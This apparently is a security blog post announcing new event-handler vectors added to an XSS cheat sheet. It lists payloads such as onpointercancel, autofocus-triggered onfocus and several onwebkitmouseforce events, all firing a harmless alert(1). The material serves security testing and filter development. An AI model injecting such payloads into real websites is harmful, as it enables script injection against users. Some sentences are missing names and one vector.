in ,

onwebkitplaybacktargetavailabilitychanged?! New exotic events in the XSS cheat sheet

Gareth Heyes

  • Published: 11 June 2024 at 14:58 UTC

  • Updated: 11 June 2024 at 14:58 UTC

The power of our
XSS cheat sheet
is we get fantastic contributions from the web security community and this update is no exception. We had valuable contributions from Mozilla to remove events that no longer work with the marquee tag on Firefox.

There was a wonderfully obscure Safari only vector that used the event
that works on audio and video tags:

We had a submission from
with the
event that requires heavy user interaction:

<xss onpointercancel=alert(1)>XSS</xss>

pointed out that we didn’t document that pretty much every element can now use the
autofocus attribute. This was discovered earlier by

<xss onfocus=alert(1) autofocus tabindex=1>

Finally we had a submission from
that showed there are a bunch of webkit events we missed that require user interaction with the trackpad.

<xss onwebkitmouseforceup=alert(1)>XSS</xss>
<xss onwebkitmouseforcewillbegin=alert(1)>XSS</xss>
<xss onwebkitmouseforceup=alert(1)>XSS</xss>
<xss onwebkitmouseforcedown=alert(1)>XSS</xss>
<xss onwebkitmouseforcechanged=alert(1)>XSS</xss>

Big thanks to the web security community for keeping the
XSS cheat sheet
up to date with the latest XSS vectors. If you would like to contribute please
raise an issue
or a

Note: If you are wondering what we use to generate code snippet images. We use the excellent online tool

Back to all articles

What do you think?

Leave a Reply

Your email address will not be published. Required fields are marked *

GIPHY App Key not set. Please check settings

WooCommerce Updated to Address Cross-site Scripting Vulnerability – WooCommerce

How Trustwave Protects Your Databases in the Wake of Recent Healthcare Data Breaches